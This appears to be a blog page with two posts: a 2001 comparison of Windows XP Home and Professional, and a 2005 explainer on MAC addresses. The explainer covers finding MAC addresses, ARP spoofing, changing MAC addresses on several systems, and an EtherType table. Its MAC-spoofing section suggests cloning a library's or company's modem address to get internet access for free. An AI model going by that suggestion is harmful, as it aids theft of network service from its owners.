At its most basic level, XP Professional is a business- and power-user oriented superset of Home Edition. Because this orientation, it includes features that wouldn't be appropriate, or would be too complex, for the typical home user. The most obvious difference is security, which is vastly simplified in Home Edition. Each interactive user in XP Home is assumed to be a member of the Owners local group, which is the Windows XP equivalent of the Windows 2000 Administrator account: This means that anyone who logs on to a Home Edition machine has full control. Likewise, the Backup Operators, Power Users, and Replicator groups from Windows 2000/XP Pro are missing from Home Edition, and a new group, called Restricted Users, is added. Hidden administrative shares (C$, etc.) are also unavailable in Home Edition.
"Professional Edition is a strict superset of Home Edition," confirmed Chris Jones, Vice President of the Windows Client Group. "Everything you can do in Home Edition, you can do in Pro. So we do think there are home users who will buy Pro." Jones' distinction is a good one: With Windows XP, the Professional Edition is finally a superset of all the desktop clients that came before (Windows Me and Windows 2000 Professional) as well as of its new sibling. So when discussing the differences between the editions, it's best to simply describe those features in Pro that you can't get in Home Edition.
Pro features that aren't in Home Edition
The following features are not present in Windows XP Home Edition.
Power user
Remote Desktop - All versions of Windows XP--including Home Edition--support Remote Assistance, which is an assisted support technology that allows a help desk or system administrator to remotely connect to a client desktop for troubleshooting purposes. But Only Pro supports the new Remote Desktop feature, which is a single-session version of Terminal Services with two obvious uses: Mobile professionals who need to remotely access their corporate desktop, and remote administration of clients on a network. You can access a Windows XP Remote Desktop from any OS that supports a Terminal Services client (such as Windows 98 and, interestingly XP Home). XP Home can act as the client in a Remote Desktop session; only Pro can be the server.
Multi-processor support - Windows XP Pro supports up to two microprocessors, while Home Edition supports only one.
Automated System Recovery (ASR) - In a somewhat controversial move, Microsoft has removed the Backup utility from the default Windows XP Home Edition, though it is available as an optional installation if you can find it on the CD-ROM (hint: it's in the /valueadd folder). The reason for this the integration of Microsoft's new Automated System Recovery (ASR) tool into Backup. In Pro, ASR will help recover a system from a catastrophic error, such as one that renders the system unbootable. ASR-enabled backups are triggerable from XP Setup, allowing you to return your system to its previous state, even if the hard drive dies and has to be replaced. Unlike consumer-oriented features such as System Restore, ASR is not automatic: It must manually be enabled from within the Backup utility in Windows XP Pro. In any event, while there is a Backup utility available for Home Edition, you cannot use ASR, even though mentions of this feature still exist in the UI. Confusing? Yes. But it's better than no Backup at all, which was the original plan.
Dynamic Disk Support - Windows XP Professional (like its Windows 2000 equivalent) supports dynamic disks, but Home Edition does not (instead, HE supports only the standard Simple Disk type). Dynamic disks are not usable with any OS other than Windows 2000 or Windows XP Pro, and they cannot be used on portable computers. Likewise, Home Edition does not include the Logical Disk Manager.
Fax - Home Edition has no integrated fax functionality out of the box, though it is an option you can install from the XP Home CD.
Internet Information Services/Personal Web Server - Home Edition does not include the IIS Web server 5.1 software found in Pro.
Security
Encrypting File System - Windows XP Professional supports the Encrypting File System (EFS), which allows you encrypt individual files or folders for local security (EFS is not enabled over a network). EFS-protected files and folders allows users to protect sensitive documents from other users.
File-level access control - Any user with Administrator privileges can limit access to certain network resources, such as servers, directories, and files, using access control lists. Only Windows XP Professional supports file-level access control, mostly because this feature is typically implemented through Group Policy Objects, which are also not available in Home Edition.
"C2" certification - Microsoft will attempt to have Windows XP Professional certified with the "C2" security designation, a largely irrelevant status, but one which will not be afforded to Home Edition.
Management
Domain membership - Home Edition cannot be used to logon to an Active Directory domain. For obvious reasons, the Domain Wizard is also missing in Home Edition.
Group Policy - Since Home Edition cannot be used to logon to an Active Directory domain, Group Policy--whereby applications, network resources, and operating systems are administered for domain users--is not supported either.
IntelliMirror - Microsoft lumps a wide range of semi-related change and configuration management technologies under the IntelliMirror umbrella, and none of these features are supported in the consumer oriented Home Edition. IntelliMirror capabilities include user data management; centrally-managed software installation, repair, updating, and removal; user settings management; and Remote Installation Services (RIS), which allows administrators to remotely install the OS on client systems.
Roaming profiles - This feature allows users to logon to any computer in an Active Directory network and automatically receive their customized settings. It is not available in Home Edition, which cannot logon to an Active Directory domain.
Corporate deployment
Multi-language support - Only Windows XP Professional will ship in a Multi-Language version or support multiple languages in a single install.
Sysprep support - Windows XP Pro will support the System Preparation (Sysprep) utility, while Home Edition will not.
RIS support - See the IntelliMirror heading in the previous section; Home Edition does not support RIS deployments.
64-bit Edition
Microsoft is shipping a 64-bit version of Windows XP for Intel Itanium systems that mirrors the Professional Edition feature-set.
Networking features
The following networking features are not included in Home Edition:
The user interface for IPSecurity (IPSec)
SNMP
Simple TCP/IP services
SAP Agent
Client Service for NetWare
Network Monitor
Multiple Roaming feature
User interface features
Windows XP Home Edition has some different default settings that affect the user interface. For example, Guest logon is on by default in Home, but off in Pro. The Address bar in Explorer windows is on in Pro by default, but off in Home. During the beta period, Microsoft had intended to use a business-oriented shell theme ("Professional") by default in Pro and the "Luna" consumer theme in Home Edition. But feedback from corporate users suggested that everyone liked the consumer-oriented Luna theme better, and development of the Professional theme was cancelled. Other user interface features that are present in Pro but not Home include:
Client-side caching
Administrative Tools option on the Start menu (a subset of the Admin tools are still present in Home, however).
It's also worth mentioning that Home Edition will support upgrades from Windows 98, 98 SE, and Millennium Edition (Me), but not from Windows 95, NT 4.0 Workstation, or Windows 2000 Professional. You can upgrade from Windows 98, 98 SE, Millennium Edition (Me), Windows NT 4.0 Workstation, or Windows 2000 Professional to Windows XP Professional. See my article on What to Expect from Windows XP for more information.
Deciding which edition to buy is simple: Peruse the above list and decide whether you can live without any of these features. If you can't, then you're going to want to get Professional. Otherwise, save $100 and get Home Edition. Note that Microsoft is offering a less-expensive Professional "Step-Up" upgrade for Home users that wish to move to XP Pro.
Extract from http://www.winsupersite.com/showcase/windowsxp_home_pro.asp
--Paul Thurrott
February 8, 2001
Updated February 20, 2001, June 15, 2001, August 24, 2001, September 4-5, 2001, November 26, 2001
Thursday, July 07, 2005
MAC Address Inside-Out
Technology Updates
Inside Out Of MAC Addresses
Mac Addresses :-
Hey Guys come on lets know what is a MAC address, what are its uses, how it can be used to get free Internet Access. ok Now let me start , Well tell me whats a MAC Address. MAC Address is short for Media Access Control Address. Its the hardware burned address into your network card or cable modem :) It is a hardware address which identifies each terminal of a network. In IEEE 802 networks, the Data Link Control (DLC) layer of the OSI Reference Model is divided into two sublayers:
1) the Logical Link Control (LLC) layer and
2) the Media Access Control (MAC) layer.
The MAC layer interfaces directly with the network media. Consequently, each different type of network media requires a different MAC layer.
On networks that do not conform to the IEEE 802 standards but do conform to the OSI Reference Model, the node address is called the Data Link Control (DLC) address.
MAC Address's are of 48 bits, means they consist of 12 hexadecimal digits (0-9 and A-F). It consists of 12 hexadecimal digits of which the first 6 digits must match the vendor of the Ethernet Card. and the Last 6 digits consits of the serial number of the ethernet vendor.
MAC Address's can be Written in following 3 manners :-
1) 123456789ABC
2) 123456-789ABC
3) 12-34-56-78-9A-BC
These MAC's are Physical Station Addresses, they cannot be called as Multicast or Broadcast Addresses.
Multicast and Broadcast Addresses can be identified easily as the second hex digit is Even and not ODD.
MultiCast Address assignments can be Found at the end of the article.
MAC addresses are assigned by the IEEE, and are used in many widely used network technologies such as :-
1) Ethernet
2) Token ring
3) 802.11 wireless networks
4) ATM (switched virtual connections only, as part of an NSAP address)
MAC addresses are designed to be permanent, but nowadays a lot of people have come out with many technologies to Modify this Hardware Burned Address and they have proved quite sucessful.The MAC address is stored in the Serial EEPROM of the Ethernet card. In addition to holding the MAC address, the EEPROM stores a backup copy of the MAC address and ID information, user configurable parameters, serial numbers for devices, checksums, type of interphase, and other bits of backed up information.
Now Let us try to understand how to identify the MAC address of your machine.
In Windows 98, 98SE (second edition), ME (Millennium)
Start => Run => type winipcfg , the MAC address will show under Ethernet Adapter Information as Adapter Address, but if the address commences with 44. then it is the dialup adapter address not your ethernet address, now drop down and select the correct describtion of your network card.
And On Windows NT4, 2000, XP and 2003
Start => Run => type cmd.exe or goto Start => Programs => for command prompt and click on it and then type ipconfig /all and your MAC address will show under your Ethernet Adapter along side Physical Address.
On linux type this
ifconfig -a (It is located next to hwaddr)
On Linux systems, the ethernet device is typically called eth0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:
# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:60:08:C4:99:AA
inet addr:131.225.84.67 bcast:131.225.87.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15647904 errors:0 dropped:0 overruns:0
TX packets:69559 errors:0 dropped:0 overruns:0
Interrupt:10 Base address:0x300
The MAC address is the HWaddr listed on the first line. In the case of this machine, it is 00:60:08:C4:99:AA.
On HP-UX
lanscan (It is located under Address without semicolon's)
$ lanscan
Hardware Station Dev Hardware Net-Interface NM Encapsulation Mjr
Path Address lu State NameUnitState ID Methods Num
2.0.2 0x08000935C99D 0 UP lan0 UP 4 ETHER 52
On MAC's
Built-in Ethernet computers using MacTCP
Generally this information is not required in order to set up an AppleTalk network. However, here are four methods to find the built-in Ethernet address:
Note: In order to obtain the Built-In Ethernet hardware address, the card will need to be initialized (hooked up to a valid Ethernet network).
Use MacTCP to identify the Ethernet address by opening MacTCP and using the Option key when selecting the Ethernet icon. For this to work you must be sure the caps lock key is NOT depressed, and connected to an Ethernet network.
If your computer is using Open Transport (OT) 1.1 there is a built-in feature that lets you find the Ethernet hardware address. Follow the steps below: (Your computer has to be on the Ethernet network to do this. If it is not, you cannot perform these steps.)
1. Open the AppleTalk control panel.
2. Go to the Edit menu and select User Mode.
3. Select the Advanced radio button and click OK.
4. Click Info.
5. The hardware address is displayed in the AppleTalk Info window.
You can also use the Apple LAN Utility to report the burned in address without being connected to a network. This article can help you locate the Apple LAN Utility software, "Where To Find Apple Software Updates" -- Lists online services for free Apple software updates.
You can obtain the AG Group EtherPeek network monitoring application, which includes a utility called it GetMyAddress. This utility will also return the address of the computer's internal Ethernet interface.
On Solaris or SunOS
ifconfig -a (The Leading '0' in the hex Digit is not printed)
On Solaris and SunOS systems, the ethernet device is typically called le0 or ie0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:
# ifconfig -a
le0: flags=863 mtu 1500
inet 131.225.80.209 netmask fffff800 broadcast 131.225.87.255
ether 8:0:20:10:d2:ae
Note: Solaris and SunOS strip off the leading 0 commonly included in the MAC address. In the case of this machine, the MAC address is 08:00:20:10:d2:ae
On Free BSD / Open BSD / Net BSD
netstat -i (It is located under Address)
Mac Address is mainly used to identify the device connected to the local network. When one computer connects to another computer on the same network ARP is used , ARP is Short for Address Resolution Protocol is used to map network IP addresses to MAC addresses.
When a computer A wants to commuicate to Computer B on the same network and Computer A knowing Computer B's Ip Address, it first finds out B's MAC adress by checking its own ARP cache. ARP cache holds the Computer A's Subnet's IP Addresses and MAC addresses.
Command to Look at arp cache on both windows and unix Machines is
linux#arp -a
C:\>WINDOWS>arp -a
Again, the IP and MAC addresses of the two pinged addresses were added to the ARP cache. These dynamic entries are only temporary and have a set time to live (TTL) period before they are erased (timeout). The TTL period varies from system to system, usually from 2 to 20 minutes, and will increase to a greater number of minutes if more data from these temporary entries is requested within the allotted TTL period. The TTL period for Windows NT has a default of two minutes, Windows 2000 has a default of 10 minutes, and Solaris has a default of 5 minutes. ARP caches of routers can be much longer which is the case with the Cisco IOS router having a cache time of 4 hours. For some computers, entries
that are static usually remain on the cache table permanently or until the computer is rebooted. The TTL periods can be adjusted on most systems as well.
For security consciousness on networks, it would be best to set your ARP caches on your switches to hold static entries. However, not all that convenient for a LAN administrator, this will prevent ARP spoofing, (an intruder sending spoofed ARP packets to Host A and Host B so that the two hosts will think the intruder’s computer is the intended host/router and send their data traffic through the intruder’s host to allow sniffing and packet manipulation/editing) also called man-in-the-middle attacks, since static ARP tables cannot be updated, hence, making the use of spoofed arp packets useless.
MAC addresses were designed to be fixed numbers that cannot be changed. However, there are some valid reasons to want to change your MAC address.
Changing MAC Addresses to Support Your ISP
Some ISPs, typically cable modem providers, sell Internet subscriptions on a per-address basis. Occasionally the ISP manages these subscriptions by assigning a static (fixed) IP address to the customer. However, this approach is an inefficient use of IP addresses that are currently in short supply.
More typically, ISPs manage single-address subscriptions by registering the MAC address of the device that connects to the ISP. This device could be a broadband modem, for example. The customer is free to build a home or small business network behind this modem, but the ISP expects the MAC address to match the registered value at all times.
Whenever a customer replaces their modem or adds a broadband router, the MAC address will no longer match that registered at the ISP, and the ISP will disable the customer's Internet connection.
Cloning MAC Addresses
One way to solve this problem is to call the ISP and ask them to update the registered MAC address to match the new hardware. A more efficient way to solve this problem is to configure the device so that it advertises the original MAC address, even though it's hardware is built to utilize a different MAC address. This process is called cloning.
Many broadband routers today support MAC address cloning as an advanced configuration option. The exact procedure varies depending on the type of router.
MAC Addresses and Cable Modems
Note that in addition to MAC addresses stored at the ISP, some broadband modems also store the MAC address of the host computer's network adapter. However, in this case, cloning is not required. It's true that changing network adapters ususally causes the cable modem connection to fail. To remedy this problem, though, requires only that the cable modem and computer be reset (and perhaps a waiting period for the ISP to release the old IP address). And this cloning can help users to get free internet access, like you can try and get the mac addresses of the companies's or library's Cable modem and Clone the MAC of their modem and viola you can use internet for free. there are series of steps of changing the MAC on different Cable Modem's which is out of scope of this article, may be some other paper will be written on it when I get a mood on writing such things. But There but its not over this cloneing can be defeated and its good for me to mention it here how it can be done it can be done with the help of digital Signatures from VeriSign, And Each Cable Modem as a Different Digital Signature which cannot be Cloned, and here is a how to from verisign about it :-
How do digital certificates prevent cable modem cloning?
A digital certificate, burned onto the cable modem ROM in the manufacturing process, serves as a unique, unforgeable online credential. It authenticates the identity of each individual cable modem to the cable modem service provider through an exchange of digital keys before permitting the cable modem user to access cable services. This digital "handshake" happens in seconds, hidden from the cable modem user.
Because a private key cannot be extracted from the original cable modem it's part of, a cloned cable modem cannot use the digital certificate and so will be unable to authenticate itself to the cable service provider. Without completing the "handshake" between a cable modem and the service provider, a hacker cannot pirate services.
How does the VeriSign Cable Modem Authentication Service work?
The process begins when the cable manufacturer's designated administrator creates a Media Access Controller (MAC) address file, containing the serial numbers and other identifying information of the cable modems requiring certificates, using the VeriSign-supplied Modem Manufacturing Agent (MMA) application.
The administrator sends the MAC file to VeriSign via the MMA, which can be networked to communicate directly with VeriSign. Or the administrator can use VeriSign's convenient, Web-based Managed PKI Control Center to send the files to VeriSign after obtaining them from the MMA. A special "Registration Authority" (RA) certificate digitally signs and encrypts all communications to and from VeriSign.
The Managed PKI system verifies the authenticity of the MAC file by validating the RA signature, and ensures that MAC addresses or serial numbers have not been used before. VeriSign then generates unique public and private key pairs, using dedicated bulk-generation hardware in our secure data center, and incorporates them along with VeriSign's digital signature, into certificates for every modem serial number in the MAC file.
VeriSign inserts the certificates and their private keys into a certificate batch file, and encrypts it with the MMA public key, keeping a copy of the encrypted file. (Only the MMA can decrypt the batch file, using its private key.)
The administrator is notified by an e-mail linking to a secure Web page to download the batch file of certificates. Certificates can be ordered and downloaded as often as needed - daily or weekly.
Using software provided and customized by VeriSign, the MMA unencrypts the batch file and inserts the certificates and private keys into your manufacturing system as the cable modems are manufactured. Your manufacturing system can then burn the certificates and keys into the modems along with the rest of their program and setup information.
Changing MAC Addresses through the Operating System
Starting with Windows 2000, users can change their MAC address through the Windows My Network Places interface. This feature relies on software support built into the adapter driver program and thus does not work for all adapters.
Likewise, the ifconfig command available in Linux and other flavors of Unix supports changing MAC addresses with the necessary network card and driver support.
Ok now let us see how MAC Address's can be changed on Different Operating Systems.
On Windows 98 and ME it can be Done using this steps :-
Goto Start->Run, type "Winipcfg"
Select your ethernet card and record the MAC address
Goto Start->Run, type "regedit" to bring up registry editor. Make sure you backup your registry in case you screw up. If you screw up important registry entries, you may damage your computer system. Again, MAKE SURE you have a good backup of your registry entry!
Locate "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net". It should have subkeys like "0000", "0001", "0002" and so on.
Click on each subkey that starts with "0000" and determine your Ethernet card by looking at "DriverDesc" key. If it did not match, then goto "0001", "0002" and so on...
Once you got the right NIC card,
Click on dropdown menu Edit->New->String Value.
Name the new string "networkaddress" and click OK.
Double-click on the new "networkaddress" string and you will be prompted for "Value data"
Enter the new MAC address you want to assign. The MAC address you enter should be a 12 digit number with NO "-", i.e. "00C095ECB761"
Here are 2 ways to activate the new MAC address:
If you have regular internal Network Interface Card:
Reboot your system
If you have PCMCIA Card, you can do the following without rebooting (Thanks to Andrew McGlashan for his input):
Open winipcfg
Select card and release the DHCP settings
Close winipcfg
Open "PC Card (PCMCIA)" -in control panel or on the task bar if set
Stop the card
Eject the card
Re-insert the card
Open winipcfg
Select card and renew the DHCP settings
Verify the new MAC address with "WinIPCFG"
On Apple's MAC's :- /* Ripped From http://slagheap.net/etherspoof */
An essential component of penetration testing and network wargames is the ability to specify arbitrary MAC addresses. This ability is also required for the implementation of certain kind of protective security functionality such as proxy ARP, in conjunction with tools such as arpcatch. It's my understanding that ARP spoofing is even being used in some experimental intrusion detection technologies.
Note that this patch is not a tool in and of itself; it merely extends other tools and APIs.
Like other BSD-derived codebases, Mac OS X and Darwin kernels like to meticulously stick the hardware address into the source field of each ethernet header. The following Darwin / Mac OS X kernel patch removes that tendency for AF_UNSPEC packets, allowing injected packets to forge that field in the header.
Also supplied below are a RAW4ALL patch, so you don't always have to be root to use raw sockets, and a FORCE_VERBOSE patch to force verbose output at boot time without having to press Option-V. Note that the FORCE_VERBOSE patch is not necessary with some Apple-supplied tarballs and CVS checkouts.
In recent days, Jeff Nathan has put together a less kludgey patch that fixes all the known issues; this is linked to below. These patches have been tested and verified with up to OS X 10.3 (Darwin 7.0) and verified to allow MAC spoofing with ethernet cards as well as wireless cards.
--------------------------------------------------------------------------------
installation
Building a Darwin kernel is a little different than building one in Open, Free, or NetBSD, so I've included brief directions. If you're a seasoned Darwin user or developer, you likely have all the tools ready to go to build xnu, the source tree for the Darwin kernel. If so, skip ahead to step 5. However, if you've just installed Mac OS X, you likely don't have everything you need to compile kernels, and there are a few steps to go through:
Grab and install the developer tools from Apple's developer site if you haven't already.
make and make install relpath from the bootstrap_cmds project.
make and make install the Libstreams project.
Unpack the cctools project,
make all in the libstuff directory,
make macos_all in the misc directory and install seg_hack.NEW as /usr/local/bin/seg_hack,
make macos in the libmacho directory and install otmp_obj/libmacho_static.a in /usr/local/lib, and
make kld_build in the ld directory and install static_kld/libkld.a in /usr/local/lib.
[Mac OS X 10.3 / Darwin 7.0 only] Build kextsymboltool from the kext_tools project and install in /usr/local/bin. You will need to pull in headers from the IOKitUser project and cctools.
Build the xnu project with the patches of your choice below, the proper options in bsd/conf/MASTER, and the directions in the README supplied by Apple in the xnu tarball. Install your new kernel at /mach_kernel. It goes without saying that you should back up your old one first.
Reboot your box.
I've encountered or heard about a variety of very different compile-time problems, depending on the version of the operating system and the developer tools you're using; if this is the case, try fiddling around with gcc_select.
The directions above, by the way, are intentionally not very thorough. I've tried to write these directions for those who will be able to make use of this patch. In other words, if you can't navigate through the directions above, you probably shouldn't be messing with this patch. Either way, please use it responsibly.
known issues
Jeff Nathan's patch should fix all the known issues with the original ETHERSPOOF patch. Do not use his patch with any of the ETHERSPOOF patches above. They are incompatible, and his patch is better.
The older ETHERSPOOF patches above break the DHCP client thanks to the funky DLILization of the kernel, and though I have yet to see them cause problems getting an address personally, I have received reports and seen the cause of the problem, empty source ethernet address fields in the header.
To Change MAC address on Windows 2000, XP and 2003 :-
This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then you have to go to second method.
Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.
Right click on the NIC you want to change the MAC address and click on properties.
Under General tab, click on the Configure button
Click on Advanced tab
Under Property section, you should see an item called Network Address or "Locally Administered Address", click on it.
On the right side, under Value, type in the New MAC address you want to assign to your NIC. Usually this value is entered without the - between the MAC address numbers.
Goto command prompt and type in ipconfig /all or net config rdr to verify the changes. If the changes are not materialized, then use the second method.
If successful, reboot your systems.
MAC's On 2000 , XP and 2003 can also be Changed With a Tool named SMAC.
To Change MAC on Windows NT :-
Goto Start->Run, type "cmd" to goto command prompt
Type "ipconfig /all" and record the MAC address for each network adapter
Goto Start->Run, type "regedit" to bring up registry editor. Make sure you backup your registry in case you screw up. If you screw up important registry entries, you may damage your computer system. Again, MAKE SURE you have a good backup of your registry entry!
Locate "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\\Parameters". should have subkeys like "xyz0000", "xyz0001", "xyz0002" and so on.
Click on each subkey that starts with "0000" and determine your Ethernet card by looking at "DriverDesc" key. If it did not match, then goto "0001", "0002" and so on...
Once you got the right NIC card,
Click on dropdown menu Edit->New->String Value.
Name the new string "NetworkAddress" and click OK.
Double-click on the new "NetworkAddress" string and you will be prompted for "Value data"
Enter the new MAC address you want to assign. The MAC address you enter should be a 12 digit number with NO "-", i.e. "00C095ECB761"
Reboot your system
Verify the new MAC address with "IPCONFIG"
TO change MAC's On Unix and Linux can be easily with a tool named macchanger, from :- http://www.alobbs.com/modules.php?op=modload&name=macc&file=index
On Linux Machines to Change MAC Address Type this :-
ifdown eth0 (where eth0 is the ethernet card)
ifconfig hw ether 11:22:AB:C5:9E:6D (<== This is the new MAC Address.)
ifup eth0
and now ifconfig -a and you have changed your mac Addy :)
Ok now here is the List of Codes of Vendor Addresses and Vendor Multicast Addresses :-
Here are the MultiCast Address Vendor Codes :-
ETHER TYPES
(last updated 2001-05-01)
Many of the networks of all classes are Ethernets (10Mb) or
Experimental Ethernets (3Mb). These systems use a message "type"
field in much the same way the ARPANET uses the "link" field.
If you need an Ether Type, contact:
IEEE Registration Authority
c/o Iris Ringel
IEEE Standards Department
445 Hoes Lane, P.O. Box 1331
Piscataway, NJ 08855-1331
Phone +1 732 562 3813
Fax: +1 732 562 1571
Email:
http://standards.ieee.org/db/oui/forms/
The following list of EtherTypes is contributed unverified information
from various sources. Another list of EtherTypes is maitained by
Michael A. Patton and is accessible at:
Assignments:
Ethernet Exp. Ethernet Description References
------------- ------------- ----------- ----------
decimal Hex decimal octal
0000 0000-05DC - - IEEE802.3 Length Field [XEROX]
0257 0101-01FF - - Experimental [XEROX]
0512 0200 512 1000 XEROX PUP (see 0A00) [8,XEROX]
0513 0201 - - PUP Addr Trans (see 0A01)[XEROX]
0400 Nixdorf [XEROX]
1536 0600 1536 3000 XEROX NS IDP [133,XEROX]
0660 DLOG [XEROX]
0661 DLOG [XEROX]
2048 0800 513 1001 Internet IP (IPv4) [IANA]
2049 0801 - - X.75 Internet [XEROX]
2050 0802 - - NBS Internet [XEROX]
2051 0803 - - ECMA Internet [XEROX]
2052 0804 - - Chaosnet [XEROX]
2053 0805 - - X.25 Level 3 [XEROX]
2054 0806 - - ARP [IANA]
2055 0807 - - XNS Compatability [XEROX]
2056 0808 - - Frame Relay ARP [RFC1701]
2076 081C - - Symbolics Private [DCP1]
2184 0888-088A - - Xyplex [XEROX]
2304 0900 - - Ungermann-Bass net debugr[XEROX]
2560 0A00 - - Xerox IEEE802.3 PUP [XEROX]
2561 0A01 - - PUP Addr Trans [XEROX]
2989 0BAD - - Banyan VINES [XEROX]
2990 0BAE - - VINES Loopback [RFC1701]
2991 0BAF - - VINES Echo [RFC1701]
4096 1000 - - Berkeley Trailer nego [XEROX]
4097 1001-100F - - Berkeley Trailer encap/IP[XEROX]
5632 1600 - - Valid Systems [XEROX]
16962 4242 - - PCS Basic Block Protocol [XEROX]
21000 5208 - - BBN Simnet [XEROX]
24576 6000 - - DEC Unassigned (Exp.) [XEROX]
24577 6001 - - DEC MOP Dump/Load [XEROX]
24578 6002 - - DEC MOP Remote Console [XEROX]
24579 6003 - - DEC DECNET Phase IV Route[XEROX]
24580 6004 - - DEC LAT [XEROX]
24581 6005 - - DEC Diagnostic Protocol [XEROX]
24582 6006 - - DEC Customer Protocol [XEROX]
24583 6007 - - DEC LAVC, SCA [XEROX]
24584 6008-6009 - - DEC Unassigned [XEROX]
24586 6010-6014 - - 3Com Corporation [XEROX]
25944 6558 - - Trans Ether Bridging [RFC1701]
25945 6559 - - Raw Frame Relay [RFC1701]
28672 7000 - - Ungermann-Bass download [XEROX]
28674 7002 - - Ungermann-Bass dia/loop [XEROX]
28704 7020-7029 - - LRT [XEROX]
28720 7030 - - Proteon [XEROX]
28724 7034 - - Cabletron [XEROX]
32771 8003 - - Cronus VLN [131,DT15]
32772 8004 - - Cronus Direct [131,DT15]
32773 8005 - - HP Probe [XEROX]
32774 8006 - - Nestar [XEROX]
32776 8008 - - AT&T [XEROX]
32784 8010 - - Excelan [XEROX]
32787 8013 - - SGI diagnostics [AXC]
32788 8014 - - SGI network games [AXC]
32789 8015 - - SGI reserved [AXC]
32790 8016 - - SGI bounce server [AXC]
32793 8019 - - Apollo Domain [XEROX]
32815 802E - - Tymshare [XEROX]
32816 802F - - Tigan, Inc. [XEROX]
32821 8035 - - Reverse ARP [48,JXM]
32822 8036 - - Aeonic Systems [XEROX]
32824 8038 - - DEC LANBridge [XEROX]
32825 8039-803C - - DEC Unassigned [XEROX]
32829 803D - - DEC Ethernet Encryption [XEROX]
32830 803E - - DEC Unassigned [XEROX]
32831 803F - - DEC LAN Traffic Monitor [XEROX]
32832 8040-8042 - - DEC Unassigned [XEROX]
32836 8044 - - Planning Research Corp. [XEROX]
32838 8046 - - AT&T [XEROX]
32839 8047 - - AT&T [XEROX]
32841 8049 - - ExperData [XEROX]
32859 805B - - Stanford V Kernel exp. [XEROX]
32860 805C - - Stanford V Kernel prod. [XEROX]
32861 805D - - Evans & Sutherland [XEROX]
32864 8060 - - Little Machines [XEROX]
32866 8062 - - Counterpoint Computers [XEROX]
32869 8065 - - Univ. of Mass. @ Amherst [XEROX]
32870 8066 - - Univ. of Mass. @ Amherst [XEROX]
32871 8067 - - Veeco Integrated Auto. [XEROX]
32872 8068 - - General Dynamics [XEROX]
32873 8069 - - AT&T [XEROX]
32874 806A - - Autophon [XEROX]
32876 806C - - ComDesign [XEROX]
32877 806D - - Computgraphic Corp. [XEROX]
32878 806E-8077 - - Landmark Graphics Corp. [XEROX]
32890 807A - - Matra [XEROX]
32891 807B - - Dansk Data Elektronik [XEROX]
32892 807C - - Merit Internodal [HWB]
32893 807D-807F - - Vitalink Communications [XEROX]
32896 8080 - - Vitalink TransLAN III [XEROX]
32897 8081-8083 - - Counterpoint Computers [XEROX]
32923 809B - - Appletalk [XEROX]
32924 809C-809E - - Datability [XEROX]
32927 809F - - Spider Systems Ltd. [XEROX]
32931 80A3 - - Nixdorf Computers [XEROX]
32932 80A4-80B3 - - Siemens Gammasonics Inc. [XEROX]
32960 80C0-80C3 - - DCA Data Exchange Cluster[XEROX]
32964 80C4 - - Banyan Systems [XEROX]
32965 80C5 - - Banyan Systems [XEROX]
32966 80C6 - - Pacer Software [XEROX]
32967 80C7 - - Applitek Corporation [XEROX]
32968 80C8-80CC - - Intergraph Corporation [XEROX]
32973 80CD-80CE - - Harris Corporation [XEROX]
32975 80CF-80D2 - - Taylor Instrument [XEROX]
32979 80D3-80D4 - - Rosemount Corporation [XEROX]
32981 80D5 - - IBM SNA Service on Ether [XEROX]
32989 80DD - - Varian Associates [XEROX]
32990 80DE-80DF - - Integrated Solutions TRFS[XEROX]
32992 80E0-80E3 - - Allen-Bradley [XEROX]
32996 80E4-80F0 - - Datability [XEROX]
33010 80F2 - - Retix [XEROX]
33011 80F3 - - AppleTalk AARP (Kinetics)[XEROX]
33012 80F4-80F5 - - Kinetics [XEROX]
33015 80F7 - - Apollo Computer [XEROX]
33023 80FF-8103 - - Wellfleet Communications [XEROX]
33031 8107-8109 - - Symbolics Private [XEROX]
33072 8130 - - Hayes Microcomputers [XEROX]
33073 8131 - - VG Laboratory Systems [XEROX]
33074 8132-8136 Bridge Communications [XEROX]
33079 8137-8138 - - Novell, Inc. [XEROX]
33081 8139-813D - - KTI [XEROX]
8148 Logicraft [XEROX]
8149 Network Computing Devices[XEROX]
814A Alpha Micro [XEROX]
33100 814C - - SNMP [JKR1]
814D BIIN [XEROX]
814E BIIN [XEROX]
814F Technically Elite Concept[XEROX]
8150 Rational Corp [XEROX]
8151-8153 Qualcomm [XEROX]
815C-815E Computer Protocol Pty Ltd[XEROX]
8164-8166 Charles River Data System[XEROX]
817D XTP [XEROX]
817E SGI/Time Warner prop. [XEROX]
8180 HIPPI-FP encapsulation [XEROX]
8181 STP, HIPPI-ST [XEROX]
8182 Reserved for HIPPI-6400 [XEROX]
8183 Reserved for HIPPI-6400 [XEROX]
8184-818C Silicon Graphics prop. [XEROX]
818D Motorola Computer [XEROX]
819A-81A3 Qualcomm [XEROX]
81A4 ARAI Bunkichi [XEROX]
81A5-81AE RAD Network Devices [XEROX]
81B7-81B9 Xyplex [XEROX]
81CC-81D5 Apricot Computers [XEROX]
81D6-81DD Artisoft [XEROX]
81E6-81EF Polygon [XEROX]
81F0-81F2 Comsat Labs [XEROX]
81F3-81F5 SAIC [XEROX]
81F6-81F8 VG Analytical [XEROX]
8203-8205 Quantum Software [XEROX]
8221-8222 Ascom Banking Systems [XEROX]
823E-8240 Advanced Encryption Syste[XEROX]
827F-8282 Athena Programming [XEROX]
8263-826A Charles River Data System[XEROX]
829A-829B Inst Ind Info Tech [XEROX]
829C-82AB Taurus Controls [XEROX]
82AC-8693 Walker Richer & Quinn [XEROX]
8694-869D Idea Courier [XEROX]
869E-86A1 Computer Network Tech [XEROX]
86A3-86AC Gateway Communications [XEROX]
86DB SECTRA [XEROX]
86DE Delta Controls [XEROX]
86DD IPv6 [IANA]
34543 86DF - - ATOMIC [Postel]
86E0-86EF Landis & Gyr Powers [XEROX]
8700-8710 Motorola [XEROX]
34667 876B - - TCP/IP Compression [RFC1144]
34668 876C - - IP Autonomous Systems [RFC1701]
34669 876D - - Secure Data [RFC1701]
880B PPP [IANA]
8847 MPLS Unicast [Rosen]
8848 MPLS Multicast [Rosen]
8A96-8A97 Invisible Software [XEROX]
